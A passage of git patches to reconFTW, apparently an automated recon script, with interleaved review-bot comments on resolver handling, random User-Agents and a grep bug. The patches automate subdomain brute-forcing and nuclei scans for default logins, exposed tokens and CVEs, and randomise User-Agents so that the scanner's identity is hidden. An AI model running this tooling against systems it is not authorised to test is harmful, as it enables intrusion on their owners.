100 ]] then eval DNScewl --tL subdomains/subdomains.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt eval DNScewl --tL .tmp/permute1.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval 
$tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt elif [[ $(cat subdomains/subdomains.txt | wc -l) -le 200 ]] then eval DNScewl --tL subdomains/subdomains.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else printf "\n${bred} Skipping Permutations: Too Much Subdomains${reset}\n\n" 
@@ -510,12 +510,50 @@ function sub_permut(){ fi } +function sub_recursive(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBRECURSIVE" = true ] + then + if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 1000 ]] + then + start_subfunc "Running : Subdomains recursive search" + echo "" > .tmp/brute_recursive_wordlist.txt + for sub in $(cat subdomains/subdomains.txt); do + sed "s/$/.$sub/" $subs_wordlist >> .tmp/brute_recursive_wordlist.txt + done + eval $tools/puredns/puredns resolve .tmp/brute_recursive_wordlist.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT -w .tmp/brute_recursive_result.txt $DEBUG_STD + cat .tmp/brute_recursive_result.txt | anew -q .tmp/brute_recursive.txt + + eval DNScewl --tL .tmp/brute_recursive.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1_recursive.txt + eval $tools/puredns/puredns resolve .tmp/DNScewl1_recursive.txt -w .tmp/permute1_recursive_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval cat .tmp/permute1_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1_recursive.txt + eval DNScewl --tL .tmp/permute1_recursive.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2_recursive.txt + eval $tools/puredns/puredns resolve .tmp/DNScewl2_recursive.txt -w .tmp/permute2_recursive_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval cat .tmp/permute1_recursive.txt .tmp/permute2_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_recursive.txt + + NUMOFLINES=$(eval cat .tmp/permute_recursive.txt .tmp/brute_recursive.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) + + if [ "$NUMOFLINES" -gt 0 ]; then + notification "${NUMOFLINES} new subdomains found with recursive search" info + fi + end_subfunc "${NUMOFLINES} new subs (recursive)" ${FUNCNAME[0]} + else 
+ notification "Skipping Recursive: Too Much Subdomains" warn + fi + else + if [ "$SUBRECURSIVE" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + function subtakeover(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBTAKEOVER" = true ] then start_func "Looking for possible subdomain takeover" touch .tmp/tko.txt - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/takeovers/ -o .tmp/tko.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/takeovers/ -r $resolvers_trusted -o .tmp/tko.txt NUMOFLINES=$(eval cat .tmp/tko.txt $DEBUG_ERROR | anew webs/takeover.txt | wc -l) if [ "$NUMOFLINES" -gt 0 ]; then notification "${NUMOFLINES} new possible takeovers found" info 
@@ -565,44 +603,6 @@ function s3buckets(){ fi } -function sub_recursive(){ - if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBRECURSIVE" = true ] - then - if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 1000 ]] - then - start_subfunc "Running : Subdomains recursive search" - echo "" > .tmp/brute_recursive_wordlist.txt - for sub in $(cat subdomains/subdomains.txt); do - sed "s/$/.$sub/" $subs_wordlist >> .tmp/brute_recursive_wordlist.txt - done - eval $tools/puredns/puredns resolve .tmp/brute_recursive_wordlist.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT -w .tmp/brute_recursive_result.txt $DEBUG_STD - cat .tmp/brute_recursive_result.txt | anew -q .tmp/brute_recursive.txt - - eval DNScewl --tL .tmp/brute_recursive.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1_recursive.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1_recursive.txt -w .tmp/permute1_recursive_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD - eval cat .tmp/permute1_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1_recursive.txt - eval DNScewl --tL .tmp/permute1_recursive.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2_recursive.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2_recursive.txt -w .tmp/permute2_recursive_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD - eval cat .tmp/permute1_recursive.txt .tmp/permute2_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_recursive.txt - - NUMOFLINES=$(eval cat .tmp/permute_recursive.txt .tmp/brute_recursive.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) - - if [ "$NUMOFLINES" -gt 0 ]; then - notification "${NUMOFLINES} new subdomains found with recursive search" info - fi - end_subfunc "${NUMOFLINES} new subs (recursive)" ${FUNCNAME[0]} - else - notification "Skipping Recursive: Too Much Subdomains" warn - fi - 
else - if [ "$SUBRECURSIVE" = false ]; then - printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" - else - printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" - fi - fi -} - ############################################################################################################### ########################################### WEB DETECTION ##################################################### ############################################################################################################### 
@@ -779,23 +779,23 @@ function nuclei_check(){ eval nuclei -update-templates $DEBUG_STD mkdir -p nuclei_output printf "${yellow}\n Running : Nuclei Technologies${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/technologies/ -o nuclei_output/technologies.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/technologies/ -r $resolvers_trusted -o nuclei_output/technologies.txt printf "${yellow}\n\n Running : Nuclei Tokens${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-tokens/ -o nuclei_output/tokens.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_output/tokens.txt printf "${yellow}\n\n Running : Nuclei Exposures${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposures/ -o nuclei_output/exposures.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposures/ -r $resolvers_trusted -o nuclei_output/exposures.txt printf "${yellow}\n\n Running : Nuclei CVEs ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/cves/ -o nuclei_output/cves.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/cves/ -r $resolvers_trusted -o nuclei_output/cves.txt printf "${yellow}\n\n Running : Nuclei Default Creds ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/default-logins/ -o nuclei_output/default_creds.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/default-logins/ -r $resolvers_trusted -o nuclei_output/default_creds.txt printf "${yellow}\n\n Running : Nuclei DNS ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/dns/ -o nuclei_output/dns.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/dns/ -r $resolvers_trusted -o nuclei_output/dns.txt printf 
"${yellow}\n\n Running : Nuclei Panels ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-panels/ -o nuclei_output/panels.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-panels/ -r $resolvers_trusted -o nuclei_output/panels.txt printf "${yellow}\n\n Running : Nuclei Security Misconfiguration ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/misconfiguration/ -o nuclei_output/misconfigurations.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/misconfiguration/ -r $resolvers_trusted -o nuclei_output/misconfigurations.txt printf "${yellow}\n\n Running : Nuclei Vulnerabilites ${reset}\n\n" - cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/vulnerabilities/ -o nuclei_output/vulnerabilities.txt + cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/vulnerabilities/ -r $resolvers_trusted -o nuclei_output/vulnerabilities.txt printf "\n\n" end_func "Results are saved in nuclei_output folder" ${FUNCNAME[0]} else @@ -987,7 +987,7 @@ function jschecks(){ cat .tmp/js_endpoints.txt | anew -q js/js_endpoints.txt.txt fi printf "${yellow} Running : Gathering secrets 4/5${reset}\n" - cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposed-tokens/ -o js/js_secrets.txt $DEBUG_STD + cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o js/js_secrets.txt $DEBUG_STD printf "${yellow} Running : Building wordlist 5/5${reset}\n" if [ -s "js/js_livelinks.txt" ] then From 054e642c3e6b16f93e3e025df83004fad14170e0 Mon Sep 17 00:00:00 2001 From: six2dez Date: Sat, 17 Apr 2021 03:12:45 +0200 Subject: [PATCH 05/19] Random agent --- install.sh | 2 ++ reconftw.cfg | 2 +- reconftw.sh | 30 +++++++++++++++--------------- 3 files changed, 18 insertions(+), 16 deletions(-) diff --git a/install.sh b/install.sh index de51ed50..e2af73ba 100755 
--- a/install.sh +++ b/install.sh @@ -163,6 +163,7 @@ mkdir -p ~/.gf mkdir -p $tools mkdir -p ~/.config/notify/ mkdir -p ~/.config/amass/ +mkdir -p ~/.config/nuclei/ touch $dir/.github_tokens eval pip3 install -U -r requirements.txt $DEBUG_STD @@ -187,6 +188,7 @@ printf "${bblue}\n Running: Installing repositories (${#repos[@]})${reset}\n\n" eval git clone https://github.com/projectdiscovery/nuclei-templates ~/nuclei-templates $DEBUG_STD eval nuclei -update-templates $DEBUG_STD sed -i 's/^miscellaneous/#miscellaneous/' ~/nuclei-templates/.nuclei-ignore +sed -i 's/^#random-agent: false/random-agent: true/' ~/.config/nuclei/config.yaml eval git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git $dir/sqlmap $DEBUG_STD eval git clone --depth 1 https://github.com/drwetter/testssl.sh.git $dir/testssl.sh $DEBUG_STD diff --git a/reconftw.cfg b/reconftw.cfg index c001d1d3..8fdbfada 100644 --- a/reconftw.cfg +++ b/reconftw.cfg @@ -18,7 +18,7 @@ NPROC=$(nproc || echo -n 1) SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" profile_shell=".$(basename $(echo $SHELL))rc" reconftw_version=$(git branch --show-current)-$(git describe --tags) -update_resolvers=false +update_resolvers=true #dir_output=/custom/output/path # Golang Vars (Comment or change on your own) diff --git a/reconftw.sh b/reconftw.sh index fd5710c2..f240e169 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -280,7 +280,7 @@ function subdomains_full(){ if [ "$update_resolvers" = true ] then if [[ $(find "$resolvers" -mtime +1 -print) ]]; then - notification "Updating resolvers lists..." warning + notification "Updating resolvers lists..." warn eval dnsvalidator -tL https://public-dns.info/nameservers.txt -threads 100 -o $resolvers $DEBUG_STD fi fi 
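Review bot: `sed -i 's/^#random-agent: false/random-agent: true/' ~/.config/nuclei/config.yaml` silently does nothing if the file does not exist yet or no longer contains that exact commented line; install.sh only creates the directory (`mkdir -p ~/.config/nuclei/` in the first hunk), so the file's presence rests on the preceding `nuclei -update-templates` having written it — worth confirming for a fresh install. Making the outcome explicit costs two lines: `sed -i 's/^#random-agent: false/random-agent: true/' ~/.config/nuclei/config.yaml 2>/dev/null` followed by `grep -q '^random-agent:' ~/.config/nuclei/config.yaml 2>/dev/null || printf 'random-agent: true\n' >> ~/.config/nuclei/config.yaml`, so the key ends up set whether or not the template line was there.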
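Review bot: Flipping `update_resolvers` to `true` changes the default behaviour of every run — subdomains_full will now re-download and validate a public resolver list from public-dns.info whenever `$resolvers` is older than a day — yet the commit is titled "Random agent" and says nothing about it. Either split this into its own commit with a message giving the reason, or at least annotate the key: `# refresh resolvers.txt via dnsvalidator from public-dns.info when the file is older than a day (needs network access)`. The resolver list shapes which servers answer every resolution stage, so a reviewer should be able to find the change that enabled automatic refresh.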
@@ -423,19 +423,19 @@ function sub_scraping(){
 then
 start_subfunc "Running : Source code scraping subdomain search"
 touch .tmp/scrap_subs.txt
- cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt
- cat subdomains/subdomains.txt | httpx -csp-probe -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/probed_tmp_scrap.txt
- cat subdomains/subdomains.txt | httpx -tls-probe -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/probed_tmp_scrap.txt
+ cat subdomains/subdomains.txt | httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt
+ cat subdomains/subdomains.txt | httpx -csp-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/probed_tmp_scrap.txt
+ cat subdomains/subdomains.txt | httpx -tls-probe -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew .tmp/probed_tmp_scrap.txt | unfurl -u domains | anew -q .tmp/probed_tmp_scrap.txt
 if [ "$DEEP" = true ] ; then
- gospider -S .tmp/probed_tmp_scrap.txt --js -t $GOSPIDER_THREADS -d 3 -H "${HEADER}" --sitemap --robots -w -r > .tmp/gospider.txt
+ gospider -S .tmp/probed_tmp_scrap.txt --js -t $GOSPIDER_THREADS -d 3 --sitemap --robots -w -r > .tmp/gospider.txt
 else
- gospider -S .tmp/probed_tmp_scrap.txt --js -t 
$GOSPIDER_THREADS -d 2 -H "${HEADER}" --sitemap --robots -w -r > .tmp/gospider.txt
+ gospider -S .tmp/probed_tmp_scrap.txt --js -t $GOSPIDER_THREADS -d 2 --sitemap --robots -w -r > .tmp/gospider.txt
 fi
 sed -i '/^.\{2048\}./d' .tmp/gospider.txt
 cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt
 eval $tools/puredns/puredns resolve .tmp/scrap_subs.txt -w .tmp/scrap_subs_resolved.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD
 NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | tee .tmp/diff_scrap.txt | wc -l)
- cat .tmp/diff_scrap.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt
+ cat .tmp/diff_scrap.txt | httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt
 end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]}
 else
 if [ "$SUBSCRAPING" = false ]; then
@@ -616,7 +616,7 @@ function webprobe_simple(){
 then
 mv .tmp/probed_tmp_scrap.txt .tmp/probed_tmp.txt
 else
- cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt
+ cat subdomains/subdomains.txt | httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt
 fi
 deleteOutScoped $outOfScope_file .tmp/probed_tmp.txt
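Review bot: Swapping `-H "${HEADER}"` for `-random-agent` on the httpx calls and simply dropping `-H "${HEADER}"` from gospider means the `HEADER` value from reconftw.cfg is no longer sent by any probe in this hunk, nor in webprobe_simple (@@ -616), webprobe_full (@@ -635), urlchecks and jschecks (@@ -899, @@ -978) or brokenLinks (@@ -1037); an operator who overrides HEADER with a program-mandated identification header — the usual reason to change it — silently loses it, and nothing in the cfg says HEADER now reaches only the nuclei and curl calls. Either keep passing it in addition (httpx still accepts `-H` next to `-random-agent`, gospider has the `-H` used on the removed lines; which User-Agent wins when both are given should be confirmed), or document the narrowed scope next to the variable, e.g. `# HEADER is sent by nuclei and curl only; httpx, gospider and gauplus use a random User-Agent`. sub_scraping starts outside this hunk.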
@@ -635,7 +635,7 @@ function webprobe_full(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBEFULL" = true ] then start_func "Http probing non standard ports" - cat subdomains/subdomains.txt | httpx -ports 81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672 -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_UNCOMMONPORTS_THREADS -timeout 10 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain" | anew -q .tmp/probed_uncommon_ports_tmp.txt + cat subdomains/subdomains.txt | httpx -ports 81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672 -follow-host-redirects -random-agent -status-code -threads $HTTPX_UNCOMMONPORTS_THREADS -timeout 10 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain" | anew -q .tmp/probed_uncommon_ports_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_uncommon_ports_tmp.txt $DEBUG_ERROR | anew webs/webs_uncommon_ports.txt | wc -l) notification "Uncommon web ports: ${NUMOFLINES} new websites" good eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR 
@@ -899,9 +899,9 @@ function urlchecks(){
 if [ $diff_webs != "0" ] || [ ! -s ".tmp/gospider.txt" ] ; then
 if [ "$DEEP" = true ] ; then
- gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -d 2 -H "${HEADER}" --sitemap --robots -w -r > .tmp/gospider.txt
+ gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -d 3 --sitemap --robots -w -r > .tmp/gospider.txt
 else
- gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -H "${HEADER}" --sitemap --robots -w -r > .tmp/gospider.txt
+ gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -d 2 --sitemap --robots -w -r > .tmp/gospider.txt
 fi
 fi
 sed -i '/^.\{2048\}./d' .tmp/gospider.txt
@@ -978,7 +978,7 @@ function jschecks(){
 cat js/url_extract_js.txt | cut -d '?' -f 1 | grep -iE "\.js$" | anew -q js/jsfile_links.txt
 cat js/url_extract_js.txt | subjs | anew -q js/jsfile_links.txt
 printf "${yellow} Running : Resolving JS Urls 2/5${reset}\n"
- cat js/jsfile_links.txt | httpx -follow-redirects -H "${HEADER}" -silent -timeout 15 -threads $HTTPX_THREADS -status-code -retries 2 -no-color | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt
+ cat js/jsfile_links.txt | httpx -follow-redirects -random-agent -silent -timeout 15 -threads $HTTPX_THREADS -status-code -retries 2 -no-color | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt
 printf "${yellow} Running : Gathering endpoints 3/5${reset}\n"
 interlace -tL js/js_livelinks.txt -threads 10 -c "python3 $tools/LinkFinder/linkfinder.py -d -i _target_ -o cli >> .tmp/js_endpoints.txt" &>/dev/null
 if [ -s ".tmp/js_endpoints.txt" ]
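Review bot: `grep "[200]"` on the rewritten httpx line in jschecks is a bracket expression matching any single `2` or `0`, not the literal status `[200]`, so nearly every line (any URL or status containing a 2 or a 0) passes and js_livelinks.txt collects non-200 URLs that the later LinkFinder and nuclei steps then fetch; brokenLinks (@@ -1037) escapes its bracket correctly with `grep "\[4"`. Change it to `grep "\[200\]"` or `grep -F "[200]"`. The bug predates this commit but now sits on the changed line; jschecks starts and ends outside this hunk.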
@@ -1037,13 +1037,13 @@ function brokenLinks(){
 start_func "Broken links checks"
 if [ ! -s ".tmp/gospider.txt" ]; then
 if [ "$DEEP" = true ] ; then
- gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -d 2 -H "${HEADER}" --sitemap --robots -w -r > .tmp/gospider.txt
+ gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -d 3 --sitemap --robots -w -r > .tmp/gospider.txt
 else
- gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -H "${HEADER}" --sitemap --robots -w -r > .tmp/gospider.txt
+ gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -d 2 --sitemap --robots -w -r > .tmp/gospider.txt
 fi
 fi
 sed -i '/^.\{2048\}./d' .tmp/gospider.txt
- cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | sort -u | httpx -follow-redirects -status-code -timeout 15 -silent -retries 2 -no-color | grep "\[4" | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt
+ cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | sort -u | httpx -follow-redirects -random-agent -status-code -timeout 15 -silent -retries 2 -no-color | grep "\[4" | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt
 NUMOFLINES=$(eval cat .tmp/brokenLinks_total.txt $DEBUG_ERROR | anew webs/brokenLinks.txt | wc -l)
 notification "${NUMOFLINES} new broken links found" info
 end_func "Results are saved in webs/brokenLinks.txt" ${FUNCNAME[0]}
From e5c000485194044f983fd884b1126a3c9e7a427a Mon Sep 17 00:00:00 2001
From: six2dez
Date: Sun, 18 Apr 2021 01:50:44 +0200
Subject: [PATCH 06/19] Gauplus random-agent
---
 reconftw.sh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/reconftw.sh b/reconftw.sh
index f240e169..09c7b9c6 100755
--- a/reconftw.sh
+++ b/reconftw.sh
@@ -334,7 +334,7 @@ function sub_passive(){
 fi
 eval curl -s "https://jldc.me/anubis/subdomains/${domain}" $DEBUG_ERROR | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d' | anew -q .tmp/jldc_psub.txt
 timeout 10m waybackurls $domain | unfurl --unique domains | anew -q .tmp/waybackurls_psub.txt
- timeout 10m gauplus -t $GAUPLUS_THREADS -subs $domain | unfurl --unique domains | anew -q .tmp/gau_psub.txt
+ timeout 10m gauplus -t $GAUPLUS_THREADS -random-agent -subs $domain | unfurl --unique domains | anew -q .tmp/gau_psub.txt
 if echo $domain | grep -q ".mil$"; then
 mildew
 mv mildew.out .tmp/mildew.out
From bdaa882725698607bc61bb8cf1410b0f3e62f653 Mon Sep 17 00:00:00 2001
From: six2dez
Date: Sun, 18 Apr 2021 02:18:58 +0200
Subject: [PATCH 07/19] Menu options fix
---
 reconftw.sh | 13 ++++++-------
 1 file changed, 6 insertions(+), 7 deletions(-)
diff --git a/reconftw.sh b/reconftw.sh
index 09c7b9c6..03002369 100755
--- a/reconftw.sh
+++ b/reconftw.sh
@@ -1659,7 +1659,7 @@ function help(){
 printf "\n [-r] [-s] [-p] [-a] [-w] [-i] [-v] [-h] [--deep] [--fs] [-o OUTPUT]\n\n"
 printf " ${bblue}TARGET OPTIONS${reset}\n"
 printf " -d domain.tld Target domain\n"
- printf " -m company Target company name\n"
+# printf " -m company Target company name\n"
 printf " -l list.txt Targets list, one per line\n"
 printf " -x oos.txt Exclude subdomains list (Out Of Scope)\n"
 printf " -i in.txt Include subdomains list\n"
@@ -1675,7 +1675,6 @@ function help(){
 printf " \n"
 printf " ${bblue}GENERAL OPTIONS${reset}\n"
 printf " --deep Deep scan (Enable some slow options for deeper scan)\n"
- printf " --fs Full scope (Enable widest scope *domain* options)\n"
 printf " -o output/path Define output folder\n"
 printf " \n"
 printf " ${bblue}USAGE EXAMPLES${reset}\n"
@@ -1688,9 +1687,9 @@ function help(){
 printf " Web scanning for subdomain list:\n"
 printf " ./reconftw.sh -d example.com -l targets.txt -w\n"
 printf " \n"
- printf " Multidomain recon:\n"
- printf " ./reconftw.sh -m company -l domainlist.txt -r\n"
- printf " \n"
+# printf " Multidomain recon:\n"
+# printf " ./reconftw.sh -m company -l domainlist.txt -r\n"
+# printf " \n"
 printf " Full recon with custom output and excluded subdomains list:\n"
 printf " ./reconftw.sh -d example.com -x out.txt -a -o custom/path\n"
 }
@@ -1723,8 +1722,8 @@ while getopts ":hd:-:l:m:x:i:varspxwo:" opt; do
 ## TARGETS
- m ) multi=$OPTARG
- ;;
+# m ) multi=$OPTARG
+# ;;
 d ) domain=$OPTARG
 ;;
 l ) list=$OPTARG
From dfeb960bfccecb1d11a43fb1bc0d5b7a08c76632 Mon Sep 17 00:00:00 2001
From: six2dez
Date: Sun, 18 Apr 2021 03:13:30 +0200
Subject: [PATCH 08/19] Gospider fix
---
 reconftw.sh | 84 ++++++++++++++++++++++++++---------------------------
 1 file changed, 42 insertions(+), 42 deletions(-)
diff --git a/reconftw.sh b/reconftw.sh
index 03002369..7703ae31 100755
--- a/reconftw.sh
+++ b/reconftw.sh
